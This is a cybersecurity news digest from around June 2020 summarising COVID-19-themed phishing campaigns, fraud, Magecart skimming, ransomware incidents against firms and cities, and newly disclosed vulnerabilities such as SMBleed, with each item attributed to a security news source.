While organised crime volumes remain broadly constant, there has been a shift to Covid-19 themed phishing campaigns and fraudulent websites as organised crime groups seek to monetise the fear, uncertainty and doubt many people feel during the pandemic.
A wide range of COVID-19 related financial scams are in progress.
— The FBI has issued an alert about threat actors exploiting mobile banking apps, cautioning about fake banking apps and trojans as mobile banking has surged 50% since the beginning of 2020.
— Magecart hackers compromised the networks of international retail chain Claire’s and sportswear retailer Intersport amid an increase in online shopping amidst the coronavirus pandemic. The hackers injected malicious code in the retailer’s website, which would send customer data to the attackers’ registered domain- ‘claires-assets.com,’ Security Week reports.
Organised crime groups have been building out attack infrastructure to affect corporations.
— On June 12 there were106,407 domain names with titles containing COVID-19 keywords, RiskIQ reports.
A range of other exploitation techniques are being attempted targeting the use of conferencing platforms.
— A new phishing campaign that acts as a conferencing platform’s invitation to join a meeting to steal Microsoft credentials from users, Cofense reports.
Mobile devices are not immune from COVID-19 themed attacks.
— Researchers have identified 12 malicious Android apps disguised as official government COVID-19 contact tracing apps, containing banking trojan Anubis and SpyNote, which collect and monitor data, Dark Reading reports.
Phishing and Malware
Extensive COVID-19 themed phishing campaigns are underway with cyber criminals exploiting health organisations, government agencies, individuals, enterprises and their IT infrastructure:
— A COVID-19 themed phishing attack with attackers sending emails from an official Dropbox domain seeks to, exploiting government efforts to provide relief funds to small business owners and stealing Microsoft credentials instead, Abnormal Security reports.
— A major car manufacturer has suffered a SNAKE ransomware attack, infecting internal servers and suspending production around the world, Dark Reading reports.
— A COVID-19 themed phishing campaign targeting OneDrive users to steal credentials by impersonating government officials sending documents containing the latest COVID-19 questionnaire, McAfee reports.
— The European power company has been attacked by the SNAKE ransomware affecting its internal IT network, Bleeping Computer reports.
— The South African Life Healthcare Group suffered a cyberattack taking down its email servers, business processing and admission systems, Sunday Times reports.
Broader threat landscape
— The Australian Government has warned of sustained targeting of Government and companies by a sophisticated state-based actor using proof-of-concept exploit code, web shells and other tools copied from open source.
— An Indian based hack-for-hire group, BellTroX, has allegedly targeted thousands of high-profile individuals and hundreds of organizations worldwide in a seven-year-long phishing campaign to steal data and conduct commercial espionage on behalf of their clients, The Hacker News reports.
Ransomware against cities
— The city of Knoxville, Tennessee, has been affected by an unknown ransomware attack, forcing it to shut down its computer network and services, ZDNet reports.
— The city of Florence, Alabama, has been hit with a ransomware attack, with the city agreeing to pay $300,000 to decrypt their files, Info Security Magazine reports.
— Hackers breached the systems of A1 Telekom, Austria’s leading mobile network operator with malware and planted multiple backdoors in November 2019. Suspected intruders are members of China-linked APT Gallium, ZDNet reports.
— Hackers have breached 300,000 accounts of the Japanese gaming giant Nintendo by asking users to purchase features in popular games with connected PayPal accounts. Hackers may have gained access to personal information like date of birth and email addresses, CNN reports.
— Microsoft has released the June patch update with fixes for 129 vulnerabilities, the highest number of releases in a single month, including 11 remote code-execution flaws in Windows, VBScript and SharePoint server, Threat Post reports.
— Two new attacks against modern Intel processors, SGAxe and CrossTalk have been discovered. SGAxe may allow sensitive data extraction from SGX enclaves and CrossTalk, which may lead to leakage of information across CPU cores, The Hacker News reports.
— A new vulnerability has been detected, CVE-2020-1206 called SMBleed, which affects the SMB protocol allowing attackers to send a specially crafted packet to an SMBv3 server, which can then leak kernel memory remotely and execute arbitrary code, The Hacker News reports.
— Six new vulnerabilities have been detected in D-Link home routers (DIR-865L model), which have reached their end of life. The most critical bug, CVE-2020-13782 is a command injection vulnerability, leaving users open to DoS attacks, Unit42 researchers reports.
— The FBI has issued an alert about the increase of fraudulent activity, which exploits the public and the shipping industry by referencing fake COVID-19 shipping laws and charging additional fees before delivering a product.